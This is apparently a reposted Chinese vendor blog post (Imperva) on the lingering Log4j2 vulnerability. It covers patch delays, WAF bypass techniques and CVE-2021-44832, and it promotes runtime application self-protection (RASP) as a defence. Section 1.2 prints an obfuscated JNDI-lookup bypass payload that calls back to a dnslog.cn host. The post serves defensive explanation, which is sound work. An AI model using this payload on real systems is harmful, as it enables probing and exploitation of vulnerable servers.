1 Log4j漏洞余波未平
此次Apache Log4j2远程代码执行漏洞影响面广,利用门槛低,危害还极大,堪称“史诗级”的漏洞。
Java的应用极其广泛且生态庞大,而Log4j作为日志处理的基础组件被几乎所有应用程序所使用。该漏洞已爆发二周多,甲方团队连夜应急,但影响持续至今,网上流传的各种利用和绕过姿势还在层出不穷,影响面持续扩大。
1.1现有系统或者第三方平台补丁无法及时到位
甲方环境中应用众多,存在很多应用系统不能马上升级Log4j组件的情况。
另外,很多基础架构设备或系统、安全设备的系统也会使用Log4j组件,这就需要等待这些厂商来提供相应的补丁。这些补丁系统的开发进度完全依赖于厂商的响应速度。
1.2攻击绕过问题
此次漏洞攻击存在了大量的绕过方法和手段,例如使用各种变量和协议的嵌套绕过方式,利用log4j lookup功能支持一些特殊的写法来对字符做二次处理方式,导致流量特征非常复杂和隐蔽。
攻击绕过样例:
${${NXOLm:EBI:hrITPd:aqyJQ:rAXPqJ:-j}${HxytOU:SObEV:UvRXs:SlyueV:UgbDDe:-n}d${aSaJjy:cvMk:-i}:l${PyDFlJ:BVF:-d}${XSEzv:MjICWc:-a}${wntfIz:iDowOF:-p}://v8eai8.dnslog.cn/THip}
另外,程序本身的加密也可能带来无法利用网络流量特征来进行检测。
1.3一波未平一波又起
俗话说:福无双至,祸不单行。在2021-12-29又被发现新的Log4j漏洞CVE-2021-44832,实在是应接不暇。可能这也是Log4j在引起了更多人关注后,会有更多的漏洞被发现。
2 使用RASP更优雅的应对零日漏洞
WAF的快速应对还依赖于漏洞特征的提取速度,也受到了前面提到的应用加密、各种变形绕过的限制,因此如果可以在应用的运行环境下部署RASP(Runtime Application Self-Protection)解决方案,则相当于获得了免疫的效果。RASP是注入到应用当中,和应用一起运行的安全检测技术,通过Hook关键函数对攻击的行为模式来进行检测,因此无需攻击特征签名,且不受到加密流量、变形绕过的干扰。
为了方便大家理解,这里我们专门针对此次Log4j的漏洞,录制了如何可以利用RASP进行默认防护的演示:
原文始发于微信公众号(IMPERVA):如何从容的应对Log4j漏洞(RASP Demo)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论